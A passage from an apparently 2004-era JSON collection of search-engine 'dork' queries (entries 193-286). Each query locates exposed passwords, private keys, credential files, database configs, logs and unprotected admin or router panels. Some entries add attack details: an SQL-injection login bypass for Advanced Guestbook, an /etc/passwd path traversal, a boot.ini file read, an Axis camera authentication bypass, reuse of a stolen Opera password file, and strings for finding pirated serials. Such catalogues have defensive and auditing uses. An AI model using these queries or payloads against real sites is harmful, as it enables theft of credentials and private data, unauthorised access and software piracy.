authentication is built into this product, it is still possible to run this service without authentication. 
Regardless, this search serves as a footprinting mechanisms for an attacker.", "submited": "2004-04-28", "request": "intitle:Remote.Desktop.Web.Connection inurl:tsweb", "id": 193}, {"short description": "inurl:php inurl:hlstats intext:\"Server Username\"", "long description": "This page shows the halflife stat script and reveals the username to the system. Table structure, database name and recent SQL queries are also shown on most systems.", "submited": "2004-04-28", "request": "inurl:php inurl:hlstats intext:\"Server Username\"", "id": 194}, {"short description": "intext:\"Tobias Oetiker\" \"traffic analysis\"", "long description": "This is the MRTG traffic analysis pages. This page lists information about machines on the network including CPU load, traffic statistics, etc. This information can be useful in mapping out a network.", "submited": "2004-05-03", "request": "intext:\"Tobias Oetiker\" \"traffic analysis\"", "id": 195}, {"short description": "inurl:tdbin", "long description": "This is the default directory for TestDirector (http://www.mercuryinteractive.com/products/testdirector/). This program contains sensitive information including software defect data which should not be publically accessible.", "submited": "2004-05-03", "request": "inurl:tdbin", "id": 196}, {"short description": "+intext:\"webalizer\" +intext:\"Total Usernames\" +intext:\"Usage Statistics for\"", "long description": "The webalizer program displays various information but this query displays usernames that have logged into the site. Attckers can use this information to mount an attack.", "submited": "2004-05-03", "request": "+intext:\"webalizer\" +intext:\"Total Usernames\" +intext:\"Usage Statistics for\"", "id": 197}, {"short description": "inurl:perform filetype:ini", "long description": "Displays the perform.ini file used by the popular irc client mIRC. 
Often times has channel passwords and/or login passwords for nickserv.", "submited": "2004-05-03", "request": "inurl:perform filetype:ini", "id": 198}, {"short description": "intitle:\"index of\" intext:globals.inc", "long description": "contains plaintext user/pass for mysql database", "submited": "2004-05-03", "request": "intitle:\"index of\" intext:globals.inc", "id": 199}, {"short description": "filetype:pdf \"Assessment Report\" nessus", "long description": "These are reports from the Nessus Vulnerability Scanner. These report contain detailed information about the vulnerabilities of hosts on a network, a veritable roadmap for attackers to folow.", "submited": "2004-05-03", "request": "filetype:pdf \"Assessment Report\" nessus", "id": 200}, {"short description": "inurl:\"smb.conf\" intext:\"workgroup\" filetype:conf conf", "long description": "These are samba configuration files. They include information about the network, trust relationships, user accounts and much more. Attackers can use this information to recon a network.", "submited": "2004-05-04", "request": "inurl:\"smb.conf\" intext:\"workgroup\" filetype:conf", "id": 201}, {"short description": "intitle:\"Samba Web Administration Tool\" intext:\"Help Workgroup\"", "long description": "This search reveals wide-open samba web adminitration servers. Attackers can change options on the server.", "submited": "2004-05-04", "request": "intitle:\"Samba Web Administration Tool\" intext:\"Help Workgroup\"", "id": 202}, {"short description": "filetype:properties inurl:db intext:password", "long description": "The db.properties file contains usernames, decrypted passwords and even hostnames and ip addresses of database servers. This is VERY severe, earning the highest danger rating.", "submited": "2004-05-04", "request": "filetype:properties inurl:db intext:password", "id": 203}, {"short description": "inurl:names.nsf?opendatabase", "long description": "A Login portal for Lotus Domino servers. 
Attackers can attack this page or use it to gather information about the server.", "submited": "2004-05-04", "request": "inurl:names.nsf?opendatabase", "id": 204}, {"short description": "\"index of\" inurl:recycler", "long description": "This is the default name of the Windows recycle bin. The files in this directory may contain sensitive information. Attackers can also crawl the directory structure of the site to find more information. In addition, the SID of a user is revealed also. An attacker could use this in a variety of ways.", "submited": "2004-05-04", "request": "\"index of\" inurl:recycler", "id": 205}, {"short description": "filetype:conf inurl:firewall -intitle:cvs", "long description": "These are firewall configuration files. Although these are often examples or sample files, in many cases they can still be used for information gathering purposes.", "submited": "2004-05-05", "request": "filetype:conf inurl:firewall -intitle:cvs", "id": 206}, {"short description": "filetype:inc intext:mysql_connect", "long description": "INC files have PHP code within them that contain unencrypted usernames, passwords, and addresses for the corresponding databases. Very dangerous stuff. The mysql_connect file is especially dangerous because it handles the actual connection and authentication with the database.", "submited": "2004-05-05", "request": "filetype:inc intext:mysql_connect", "id": 207}, {"short description": "\"HTTP_FROM=googlebot\" googlebot.com \"Server_Software=\"", "long description": "These pages contain trace information that was collected when the googlebot crawled a page. The information can include many different things such as path names, header information, server software versions and much more. 
Attackers can use information like this to formulate an attack against a site.", "submited": "2004-05-06", "request": "\"HTTP_FROM=googlebot\" googlebot.com \"Server_Software=\"", "id": 208}, {"short description": "\"Request Details\" \"Control Tree\" \"Server Variables\"", "long description": "These pages contain a great deal of information including path names, session ID's, stack traces, port numbers, ip addresses, and much much more. Attackers can use this information to formulate a very advanced attack against these targets.", "submited": "2004-05-06", "request": "\"Request Details\" \"Control Tree\" \"Server Variables\"", "id": 209}, {"short description": "filetype:reg reg +intext:\"defaultusername\" +intext:\"defaultpassword\"", "long description": "These pages display windows registry keys which reveal passwords and/or usernames.", "submited": "2004-05-07", "request": "filetype:reg reg +intext:\"defaultusername\" +intext:\"defaultpassword\"", "id": 210}, {"short description": "inurl:metaframexp/default/login.asp | intitle:\"Metaframe XP Login\"", "long description": "These are Citrix Metaframe login portals. Attackers can use these to profile a site and can use insecure setups of this application to access the site.", "submited": "2004-05-10", "request": "inurl:metaframexp/default/login.asp | intitle:\"Metaframe XP Login\"", "id": 211}, {"short description": "inurl:/Citrix/Nfuse17/", "long description": "These are Citrix Metaframe login portals. Attackers can use these to profile a site and can use insecure setups of this application to access the site.", "submited": "2004-05-10", "request": "inurl:/Citrix/Nfuse17/", "id": 212}, {"short description": "filetype:wab wab", "long description": "These are Microsoft Outlook Mail address books. 
The information contained will vary, but at the least an attacker can glean email addresses and contact information.", "submited": "2004-05-10", "request": "filetype:wab wab", "id": 213}, {"short description": "filetype:reg reg HKEY_CURRENT_USER username", "long description": "This search finds registry files from the Windows Operating system. Considered the \"soul\" of the system, these files, and snippets from these files, contain sensitive information, in this case usernames and/or passwords.", "submited": "2004-05-11", "request": "filetype:reg reg HKEY_CURRENT_USER username", "id": 214}, {"short description": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "long description": "This search reveals SSH host keys from the Windows Registry. These files contain information about where the user connects including hostnames and port numbers, and show sensitive information such as the SSH host key in use by that client.", "submited": "2004-05-11", "request": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "id": 215}, {"short description": "inurl:/tmp", "long description": "Many times, this search will reveal temporary files and directories on the web server. The information included in these files and directories will vary, but an attacker could use this information in an information gathering campaign.", "submited": "2004-05-11", "request": "inurl:/tmp", "id": 216}, {"short description": "filetype:mbx mbx intext:Subject", "long description": "These searches reveal Outlook v 1-4 or Eudora mailbox files. Often these are made public on purpose, sometimes they are not. Either way, addresses and email text can be pulled from these files.", "submited": "2004-05-11", "request": "filetype:mbx mbx intext:Subject", "id": 217}, {"short description": "intitle:\"eMule *\" intitle:\"- Web Control Panel\" intext:\"Web Control Panel\" \"Enter your password here.\"", "long description": "This is the login page for eMule, the p2p file-sharing program. 
These pages forego the login name, prompting only for a password. Attackers can use this to profile a target, gather information and ultimately upload or download files from the target (which is a function of the emule program itself)", "submited": "2004-05-11", "request": "intitle:\"eMule *\" intitle:\"- Web Control Panel\" intext:\"Web Control Panel\" \"Enter your password here.\"", "id": 218}, {"short description": "inurl:\"webadmin\" filetype:nsf", "long description": "This is a standard login page for Domino Web Administration.", "submited": "2004-05-11", "request": "inurl:\"webadmin\" filetype:nsf", "id": 219}, {"short description": "filetype:reg reg +intext:\"internet account manager\"", "long description": "This google search reveals users names, pop3 passwords, email addresses, servers connected to and more. The IP addresses of the users can also be revealed in some cases.", "submited": "2004-05-12", "request": "filetype:reg reg +intext:\"internet account manager\"", "id": 220}, {"short description": "filetype:eml eml +intext:\"Subject\" +intext:\"From\" +intext:\"To\"", "long description": "These are oulook express email files which contain emails, with full headers. The information in these emails can be useful for information gathering about a target.", "submited": "2004-05-12", "request": "filetype:eml eml +intext:\"Subject\" +intext:\"From\"", "id": 221}, {"short description": "inurl:vtund.conf intext:pass -cvs", "long description": "Theses are vtund configuration files (http://vtun.sourceforge.net). Vtund is an encrypted tunneling program. The conf file holds plaintext passwords. Many sites use the default password, but some do not. 
Regardless, attackers can use this information to gather information about a site.", "submited": "2004-05-12", "request": "inurl:vtund.conf intext:pass -cvs", "id": 222}, {"short description": "inurl:login filetype:swf swf", "long description": "This search reveals sites which may be using Shockwave (Flash) as a login mechanism for a site. The usernames and passwords for this type of login mechanism are often stored in plaintext inside the source of the .swl file.", "submited": "2004-05-12", "request": "inurl:login filetype:swf swf", "id": 223}, {"short description": "filetype:url +inurl:\"ftp://\" +inurl:\"@\"", "long description": "These are FTP Bookmarks, some of which contain plaintext login names and passwords.", "submited": "2004-05-12", "request": "filetype:url +inurl:\"ftp://\" +inurl:\"@\"", "id": 224}, {"short description": "intitle:guestbook \"advanced guestbook 2.2 powered\"", "long description": "Advanced Guestbook v2.2 has an SQL injection problem which allows unauthorized access. 
AttackerFrom there, hit \"Admin\" then do the following:Leave username field blank.For password, enter this exactly:') OR ('a' = 'aYou are now in the Guestbook's Admin section.http://www.securityfocus.com/bid/10209", "submited": "2004-05-12", "request": "intitle:guestbook \"advanced guestbook 2.2 powered\"", "id": 225}, {"short description": "intitle:\"300 multiple choices\"", "long description": "This search shows sites that have the 300 error code, but also reveal a server tag at the bottom of the page that an attacker could use to profile a system.", "submited": "2004-05-13", "request": "intitle:\"300 multiple choices\"", "id": 226}, {"short description": "intitle:\"index of\" mysql.conf OR mysql_config", "long description": "This file contains port number, version number and path info to MySQL server.", "submited": "2004-05-13", "request": "intitle:\"index of\" mysql.conf OR mysql_config", "id": 227}, {"short description": "filetype:lic lic intext:key", "long description": "License files for various software titles that may contain contact info and the product version, license, and registration in a .LIC file.", "submited": "2004-05-13", "request": "filetype:lic lic intext:key", "id": 228}, {"short description": "\"please log in\"", "long description": "This is a simple search for a login page. Attackers view login pages as the \"front door\" to a site, but the information about where this page is stored and how it is presented can provide clues about breaking into a site.", "submited": "2004-05-13", "request": "\"please log in\"", "id": 229}, {"short description": "filetype:log username putty", "long description": "These log files record info about the SSH client PUTTY. 
These files contain usernames, site names, IP addresses, ports and various other information about the SSH server connected to.", "submited": "2004-05-13", "request": "filetype:log username putty", "id": 230}, {"short description": "filetype:log inurl:\"password.log\"", "long description": "These files contain cleartext usernames and passwords, as well as the sites associated with those credentials. Attackers can use this information to log on to that site as that user.", "submited": "2004-05-13", "request": "filetype:log inurl:\"password.log\"", "id": 231}, {"short description": "intitle:\"Dell Remote Access Controller\"", "long description": "This is the Dell Remote Access Controller that allows remote administration of a Dell server.", "submited": "2004-05-17", "request": "intitle:\"Dell Remote Access Controller\"", "id": 232}, {"short description": "filetype:vsd vsd network -samples -examples", "long description": "Reveals network maps (or any other kind you seek) that can provide sensitive information such as internal IPs, protocols, layout, firewall locations and types, etc. Attackers can use these files in an information gathering campaign.", "submited": "2004-05-13", "request": "filetype:vsd vsd network -samples -examples", "id": 233}, {"short description": "intitle:intranet inurl:intranet +intext:\"human resources\"", "long description": "According to whatis.com: \"An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] 
and in general looks like a private version of the Internet.\" This search allows you to not only access a company's private network, but also provides employee listings and other sensitive information that can be incredibly useful for any social engineering endeavour", "submited": "2004-05-13", "request": "intitle:intranet inurl:intranet +intext:\"human resources\"", "id": 234}, {"short description": "filetype:log cron.log", "long description": "Displays logs from cron, the *nix automation daemon. Can be used to determine backups, full and relative paths, usernames, IP addresses and port numbers of trusted network hosts, or just about anything the admin of the box decides to automate. An attacker could use this information to possibly determine what extra vulnerable services are running on the machine, to find the location of backups, and, if the sysadmin uses cron to back up their logfiles, this cron log will give that away too.", "submited": "2004-05-14", "request": "filetype:log cron.log", "id": 235}, {"short description": "filetype:log access.log -CVS", "long description": "These are http server access logs which contain all sorts of information ranging from usernames and passwords to trusted machines on the network to full paths on the server. Could be VERY useful in scoping out a potential target.", "submited": "2004-05-14", "request": "filetype:log access.log -CVS", "id": 236}, {"short description": "filetype:blt blt +intext:screenname", "long description": "Reveals AIM buddy lists, including screenname and who's on their 'buddy' list and their 'blocked' list.", "submited": "2004-05-14", "request": "filetype:blt blt +intext:screenname", "id": 237}, {"short description": "filetype:dat \"password.dat\"", "long description": "This file contains plaintext usernames and passwords. 
Deadly information in the hands of an attacker.", "submited": "2004-05-17", "request": "filetype:dat \"password.dat\"", "id": 238}, {"short description": "intitle:intranet inurl:intranet +intext:\"phone\"", "long description": "These pages are often private intranet pages which contain phone listings and email addresses. These pages can be used as a sort of online \"dumpster dive\".", "submited": "2004-05-17", "request": "intitle:intranet inurl:intranet +intext:\"phone\"", "id": 239}, {"short description": "filetype:conf slapd.conf", "long description": "slapd.conf is the file that contains all the configuration for OpenLDAP, including the root password, all in clear text. Other useful information that can be gleaned from this file includes full paths of other related installed applications, the r/w/e permissions for various files, and a bunch of other stuff.", "submited": "2004-05-17", "request": "filetype:conf slapd.conf", "id": 240}, {"short description": "inurl:php.ini filetype:ini", "long description": "The php.ini file contains all the configuration for how PHP is parsed on a server. It can contain default database usernames, passwords, hostnames, IP addresses, ports, initialization of global variables and other information. Since it is found by default in /etc, you might be able to find a lot more unrelated information in the same directory.", "submited": "2004-05-17", "request": "inurl:php.ini filetype:ini", "id": 241}, {"short description": "inurl:domcfg.nsf", "long description": "This will return a listing of servers running Lotus Domino. These servers by default have very descriptive error messages which can be used to obtain path and OS information. 
In addition, adding \"Login Form Mapping\" to the search will allow you to see detailed information about a few of the servers that have this option enabled.", "submited": "2004-05-17", "request": "inurl:domcfg.nsf", "id": 242}, {"short description": "filetype:pem intext:private", "long description": "This search will find private key files... Private key files are supposed to be, well... private.", "submited": "2004-05-17", "request": "filetype:pem intext:private", "id": 243}, {"short description": "\"Mecury Version\" \"Infastructure Group\"", "long description": "Mecury is a centralized ground control program for research satellites. This query simply locates servers running this software. As it seems to run primarily on PHP and MySQL, there are many possible vulnerabilities associated with it.", "submited": "2004-05-18", "request": "\"Mecury Version\" \"Infastructure Group\"", "id": 244}, {"short description": "filetype:conf inurl:proftpd.conf -sample", "long description": "A standard FTP configuration file that provides far too many details about how the server is setup, including installation paths, location of logfiles, generic username and associated group, etc", "submited": "2004-05-20", "request": "filetype:conf inurl:proftpd.conf -sample", "id": 245}, {"short description": "+htpasswd +WS_FTP.LOG filetype:log", "long description": "WS_FTP.LOG can be used in many ways to find more information about a server. This query is very flexible, just substitute \"+htpasswd\" for \"+FILENAME\" and you may get several hits that you hadn't seen with the 'normal' search. Filenames suggested by the forum to explore are: phpinfo, admin, MySQL, password, htdocs, root, Cisco, Oracle, IIS, resume, inc, sql, users, mdb, frontpage, CMS, backend, https, editor, intranet . 
The list goes on and on. A different approach might be \"allinurl: \"some.host.com\" WS_FTP.LOG filetype:log\" which tells you more about who's uploading files to a specific site.", "submited": "2004-05-20", "request": "+htpasswd +WS_FTP.LOG filetype:log", "id": 246}, {"short description": "\"error found handling the request\" cocoon filetype:xml", "long description": "Cocoon is an XML publishing framework. It allows you to define XML documents and transformations to be applied on it, to eventually generate a presentation format of your choice (HTML, PDF, SVG). For more information read http://cocoon.apache.org/2.1/overview.html. This Cocoon error displays library functions, cocoon version number, and full and/or relative path names.", "submited": "2004-07-29", "request": "\"error found handling the request\" cocoon filetype:xml", "id": 247}, {"short description": "intitle:\"Big Sister\" +\"OK Attention Trouble\"", "long description": "This search reveals internal network status information about services and hosts.", "submited": "2004-05-24", "request": "intitle:\"Big Sister\" +\"OK Attention Trouble\"", "id": 248}, {"short description": "inurl:\"/cricket/grapher.cgi\"", "long description": "This search reveals information about internal networks, such as configuration, services, bandwidth.", "submited": "2004-05-24", "request": "inurl:\"/cricket/grapher.cgi\"", "id": 249}, {"short description": "inurl:\"cacti\" +inurl:\"graph_view.php\" +\"Settings Tree View\" -cvs -RPM", "long description": "This search reveals internal network info including architecture, hosts and services available.", "submited": "2004-05-24", "request": "inurl:\"cacti\" +inurl:\"graph_view.php\" +\"Settings Tree View\" -cvs -RPM", "id": 250}, {"short description": "intitle:\"System Statistics\" +\"System and Network Information Center\"", "long description": "This search reveals internal network information including network configuration, ping times, services, and host info.", "submited": 
"2004-05-24", "request": "intitle:\"System Statistics\" +\"System and Network Information Center\"", "id": 251}, {"short description": "inurl:\"wvdial.conf\" intext:\"password\"", "long description": "The wvdial.conf is used for dialup connections.it contains phone numbers, usernames and passwords in cleartext.", "submited": "2004-05-24", "request": "inurl:\"wvdial.conf\" intext:\"password\"", "id": 252}, {"short description": "filetype:inc dbconn", "long description": "This file contains the username and password the website uses to connect to the db. Lots of these Google results don't take you straight to 'dbconn.inc', instead they show you an error message -- that shows you exactly where to find dbconn.inc!!", "submited": "2004-05-26", "request": "filetype:inc dbconn", "id": 253}, {"short description": "inurl:\"slapd.conf\" intext:\"credentials\" -manpage -\"Manual Page\" -man: -sample", "long description": "slapd.conf is the configuration file for slapd, the opensource LDAP deamon. The key \"credentinals\" contains passwords in cleartext.", "submited": "2004-05-25", "request": "inurl:\"slapd.conf\" intext:\"credentials\" -manpage -\"Manual Page\" -man: -sample", "id": 254}, {"short description": "inurl:\"slapd.conf\" intext:\"rootpw\" -manpage -\"Manual Page\" -man: -sample", "long description": "slapd.conf is the configuration file for slapd, the opensource LDAP deamon. You can view a cleartext or crypted password for the \"rootdn\".", "submited": "2004-05-25", "request": "inurl:\"slapd.conf\" intext:\"rootpw\" -manpage -\"Manual Page\" -man: -sample", "id": 255}, {"short description": "filetype:ini ws_ftp pwd", "long description": "The encryption method used in WS_FTP is _extremely_ weak. 
These files can be found with the \"index of\" keyword or by searching directly for the PWD= value inside the configuration file.", "submited": "2004-05-26", "request": "filetype:ini ws_ftp pwd", "id": 256}, {"short description": "inurl:forward filetype:forward -cvs", "long description": "Users on *nix boxes can forward their mail by placing a .forward file in their home directory. These files reveal email addresses.", "submited": "2004-05-26", "request": "inurl:forward filetype:forward -cvs", "id": 257}, {"short description": "\"Invision Power Board Database Error\"", "long description": "These are SQL error messages, ranging from too many connections, access denied to user xxx, showing full path info to the php files etc. There is an exploitable bug in version 1.1 of this software and the current version is 1.3 available for download on the site.", "submited": "2004-05-28", "request": "\"Invision Power Board Database Error\"", "id": 258}, {"short description": "filetype:netrc password", "long description": "The .netrc file is used for automatic login to servers. The passwords are stored in cleartext.", "submited": "2004-05-26", "request": "filetype:netrc password", "id": 259}, {"short description": "signin filetype:url", "long description": "Javascript for user validation is a bad idea as it shows cleartext user/pass combos. There is one googledork who forgot that.", "submited": "2004-05-26", "request": "signin filetype:url", "id": 260}, {"short description": "filetype:dat wand.dat", "long description": "The world-famous web-browser Opera has the ability to save the password for you, and it calls the system \"Magic Wand\". When on a site, you can save the username and password to the magic wand, then on the site again, click the magic wand icon and it will fill it out automatically for you. What a joy! 
Opera saves this file on you'r computer, it is located (on winXP) here: D:\\Documents and Settings\\Peefy\\Programdata\\Opera\\Opera75\\profile\\wand.dat for me offcourse, change it so its suitable for you..But, if you don't have a descrambler or whatever, the passwords arent cleartext, but you have to put the wand file in the location specified above, then open opera, click tools, Wand Passwords, then see the URL's saved, then go to theese URL's and click the wand button.", "submited": "2004-05-27", "request": "filetype:dat wand.dat", "id": 261}, {"short description": "\"Index Of /network\" \"last modified\"", "long description": "Many of these directories contain information about the network, though an attacker would need a considerable amount of patience to find it.", "submited": "2004-06-01", "request": "\"Index Of /network\" \"last modified\"", "id": 262}, {"short description": "inurl:/eprise/", "long description": "silkRoad Eprise is a dynamic content management product that simplifies the flow of content to a corporate website. The software requires NT 4, Windows 2000 or Solaris and is used by high-profile corporations. If an attacker cuts the url after the eprise/ directory, he is presented with the admin logon screen.", "submited": "2004-05-26", "request": "inurl:/eprise/", "id": 263}, {"short description": "intitle:\"album permissions\" \"Users who can modify photos\" \"EVERYBODY\"", "long description": "Gallery (http://gallery.menalto.com) is software that allows users to create webalbums and upload pictures to it. In some installations Gallery lets you access the Admin permission page album_permissions.php without authentication. 
Even if not \"everybody\" has modify rights, an attacker can do a search for \"users who can see the album\" to retrieve valid usernames for the gallery.", "submited": "2004-06-02", "request": "intitle:\"album permissions\" \"Users who can modify photos\" \"EVERYBODY\"", "id": 264}, {"short description": "filetype:cfg mrtg \"target[*]\" -sample -cvs -example", "long description": "Mrtg.cfg is the configuration file for polling SNMP enabled devices. The community string (often 'public') is found in the line starting with target:#Target[test]: 1.3.6.1.4.1.2021.10.1.5.1&1.3.6.1.4.1.2021.10.1.5.2:public@localhostRemember not all targets are SNMP devices. Users can monitor CPU info for example.", "submited": "2004-06-02", "request": "filetype:cfg mrtg \"target[*]\" -sample -cvs -example", "id": 265}, {"short description": "filetype:ldb admin", "long description": "According to filext.com, the ldb file is \"A lock file is used to keep muti-user databases from being changed in the same place by two people at the same time resulting in data corruption.\" These Access lock files contain the username of the last user and they ALWAYS have the same filename and location as the database. Attackers can substitute mdb for ldb and dowload the database file.", "submited": "2004-06-02", "request": "filetype:ldb admin", "id": 266}, {"short description": "inurl:search/admin.php", "long description": "phpMySearch is a personal search engine that one can use to provide a search feature for one's own Web site. With this search an attacker can find admin logon screens. This software does not seem to be very popular yet, but would allow attackers to access indexed information about the host if compromised.", "submited": "2004-05-30", "request": "inurl:search/admin.php", "id": 267}, {"short description": "filetype:r2w r2w", "long description": "WRQ Reflection gives you a standard desktop that includes web- and Windows-based terminal emulation and X Windows products. 
Terminal emulation settings are saved to a configuration file, depending on the version called r1w, r2w, or r4w. If an attacker loads these files he can access the main login screen on mainframe systems for example.", "submited": "2004-06-04", "request": "filetype:r2w r2w", "id": 268}, {"short description": "filetype:php inurl:vAuthenticate", "long description": "vAuthenticate is a multi-platform compatible PHP and MySQL script which allows creation of new user accounts, new user groups, activate/inactivate groups or individual accounts, set user level, etc. There are two admin users by default with an easy to guess password. The backup admin user can *not* be deleted. There is also a test account with the same password that can not be deleted. An attacker can find the default passwords by downloading the software and browsing the .sql files. Default passwords are seldom changed if the user is not *forced* to change them first before using the software. This software doesn't enforce such a rule.", "submited": "2004-06-04", "request": "filetype:php inurl:vAuthenticate", "id": 269}, {"short description": "intitle:\"ZyXEL Prestige Router\" \"Enter password\"", "long description": "This is the main authentication screen for the ZyXEL Prestige Router.", "submited": "2004-06-04", "request": "intitle:\"ZyXEL Prestige Router\" \"Enter password\"", "id": 270}, {"short description": "\"Welcome to the Prestige Web-Based Configurator\"", "long description": "This is the configuration screen for a Prestige router. This page indicates that the router has not yet been set up and any web user can make changes to the router.", "submited": "2004-06-04", "request": "\"Welcome to the Prestige Web-Based Configurator\"", "id": 271}, {"short description": "intitle:\"ADSL Configuration page\"", "long description": "This is the status screen for the Solwise ADSL modem. Information available from this page includes IP addresses, MAC addresses, subnet mask, firmware version of the modem. 
Attackers can use this information to formulate an attack.", "submited": "2004-06-04", "request": "intitle:\"ADSL Configuration page\"", "id": 272}, {"short description": "\"Version Info\" \"Boot Version\" \"Internet Settings\"", "long description": "This is the status page for a Belkin Cable/DSL gateway. Information can be retrieved from this page including IP addresses, WAN addresses, MAC addresses, firmware versions, serial numbers, subnet masks, firewall settings, encryption settings, NAT settings and SSID. Attackers can use this information to formulate an attack.", "submited": "2004-06-04", "request": "\"Version Info\" \"Boot Version\" \"Internet Settings\"", "id": 273}, {"short description": "filetype:sql +\"IDENTIFIED BY\" -cvs", "long description": "Database maintenance is often automated by use of .sql files which may contain many lines of batched SQL commands. These files are often used to create databases and set or alter permissions. The passwords used can be either encrypted or even plaintext. An attacker can use these files to acquire database permissions that normally would not be given to the masses.", "submited": "2004-06-04", "request": "filetype:sql +\"IDENTIFIED BY\" -cvs", "id": 274}, {"short description": "filetype:sql password", "long description": "Database maintenance is often automated by use of .sql files that contain many lines of batched SQL commands. These files are often used to create databases and set or alter permissions. The passwords used can be either encrypted or even plaintext. An attacker can use these files to acquire database permissions that normally would not be given to the masses.", "submited": "2004-06-04", "request": "filetype:sql password", "id": 275}, {"short description": "intitle:\"Welcome Site/User Administrator\" \"Please select the language\" -demos", "long description": "Service providers worldwide use Ensim's products to automate the management of their hosting services. 
Currently it hosts more than 500,000 Web sites and five million mailboxes.Ensim's uses a control panel GUI to manage the servers. It has four levels of priviledges. The software runs on TCP port 19638, but access is normally limited to trusted hosts only. A local exploit was found by badc0ded.org in virthostmail, part of Ensim WEBppliance Pro.", "submited": "2004-06-10", "request": "intitle:\"Welcome Site/User Administrator\" \"Please select the language\" -demos", "id": 276}, {"short description": "filetype:pwd service", "long description": "Microsoft Frontpage extensions appear on virtually every type of scanner. In the late 90's people thought they where hardcore by defacing sites with Frontpage. Today, there are still vulnerable servers found with Google. An attacker can simply take advantage from administrators who 'forget' to set up the policies for Frontpage extensions. An attacker can also search for 'filetype:pwd users'.", "submited": "2004-06-10", "request": "filetype:pwd service", "id": 277}, {"short description": "\"ttawlogin.cgi/?action=\"", "long description": "Tarantella is a family of enterprise-class secure remote access software products. This Google-dork lists the login page for remote access to either the site server or another server within the target company. Tarantella also has a few security issues for a list of possible things that a malicous user could try to do, have a look at - http://www.tarantella.com/security/index.html An example of a malicous user could try is http://www.tarantella.com/security/bulletin-03.html the exploit isn't included in the User-Notice, but I've worked it out to be something like install directory/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd", "submited": "2004-06-04", "request": "\"ttawlogin.cgi/?action=\"", "id": 278}, {"short description": "Axis Network Cameras", "long description": "The AXIS 2400 is a Web server of its own. 
This means that the server is secured like any other Internet host. It is up to the network manager to restrict access to the AXIS Web Cameras camera server. AXIS Network cams have a cam control page called indexFrame.shtml wich can easily be found by searching Google. An attacker can look for the ADMIN button and try the default passwords found in the documentation. An attacker may also find that the directories are browsable. Additional security related information was found on the Internet.Securityfocus(www.securityfocus.com):----------------------------------------------------\"It has been reported that the Axis Video Servers do not properly handle input to the 'command.cgi' script. Because of this, an attacker may be able to create arbitrary files that would result in a denial of service, or potentially command execution.\" Core Security Technologies Advisory (http://www.coresecurity.com):---------------------------------------------------\"We have discovered the following security vulnerability: by accessing http://camera-ip//admin/admin.shtml (notice the double slash) the authentication for \"admin\" is bypassed and an attacker gains direct access to the configuration.", "submited": "2004-06-06", "request": "inurl:indexFrame.shtml Axis", "id": 279}, {"short description": "POWERED BY HIT JAMMER 1.0!", "long description": "Hit Jammer is a Unix compatible script that allows you to manage the content and traffic exchange and make web changes, all without needing HTML. It is typicaly used by the underground sites on the Net who \"pay for surfing ads\" and advertise spam services or software.An attacker can find these sites by searching for the typical \"powered by hit jammer !\" frase on the bottom of the main page. Then if he changes the URL to www.target.com/admin/admin.php he is taken to the admin panel. Hit Jammer administrators are warned to protect this page with the .htaccess logon procedure, but many fail to do just that. 
In such cases, customer information like email addresses and passwords are in clear view of the attacker. Since human beings often use one simple password for many things this is a very dangerous practice.", "submited": "2004-06-06", "request": "POWERED BY HIT JAMMER 1.0!", "id": 280}, {"short description": "94FBR \"ADOBE PHOTOSHOP\"", "long description": "94FBR is part of many serials. An malicious user would only have to change the programm name (photoshop in this example) in this search to find a perfectly valid serial.Other values to look for are: GC6J3. GTQ62. FP876. D3DX8.", "submited": "2004-06-10", "request": "94FBR \"ADOBE PHOTOSHOP\"", "id": 281}, {"short description": "inurl:zebra.conf intext:password -sample -test -tutorial -download", "long description": "GNU Zebra is free software that manages TCP/IP based routing protocols. It supports BGP-4 protocol as well as RIPv1, RIPv2 and OSPFv2.The zebra.conf uses the same format as the cisco config files. There is an enable password (plain text or encrypted) and ipv6 tunnel definitions, hostnames, ethernet interface names, ip routing information, etc.", "submited": "2004-06-10", "request": "inurl:zebra.conf intext:password -sample -test -tutorial -download", "id": 282}, {"short description": "inurl:ospfd.conf intext:password -sample -test -tutorial -download", "long description": "GNU Zebra is free software that manages TCP/IP based routing protocols. It supports BGP-4 protocol as well as RIPv1, RIPv2 and OSPFv2.The ospfd.conf uses the same format as the cisco config files. 
There is an enable password (plain text or encrypted) and ipv6 tunnel definitions, hostnames, ethernet interface names, ip routing information, etc.", "submited": "2004-06-10", "request": "inurl:ospfd.conf intext:password -sample -test -tutorial -download", "id": 283}, {"short description": "intitle:\"Index of /\" modified php.exe", "long description": "PHP installed as a cgi-bin on a Windows Apache server will allow an attacker to view arbitrary files on the hard disk, for example by requesting \"/php/php.exe?c:\\boot.ini.\"", "submited": "2004-06-10", "request": "intitle:\"Index of /\" modified php.exe", "id": 284}, {"short description": "inurl:ccbill filetype:log", "long description": "CCBill.com sells E-tickets to online entertainment and subscription-based websites. CCBill.com gives consumers access to the hottest entertainment sites on the World Wide Web. The word \"hot\" in this context seems apropriate when considering the type of sites that use e-tickets :)CCBill log files contain usernames and password information, but are protected with DES encryption. An attacker can crack these using the information provided on this site: http://www.jaddo.net/forums/index.php?&act=ST&f=19&t=4242.", "submited": "2004-06-18", "request": "inurl:ccbill filetype:log", "id": 285}, {"short description": "filetype:mdb inurl:users.mdb", "long description": "Everyone has this problem, we need to remember many passwords to access the resources we use. Some believe it is a good solution to use Microsoft Access as a password database..An attacker can find and download those mdb files easily with Google. This search tries to find such \"user\" databases. Some are password protected, many are not. Weee!", "submited": "2004-06-16", "request": "filetype:mdb inurl:users.mdb", "id": 286}, {"short description": "intitle:\"Error using Hypernews\" \"Server Software\"", "long description": "HyperNews is a cross between the WWW and Usenet News. 
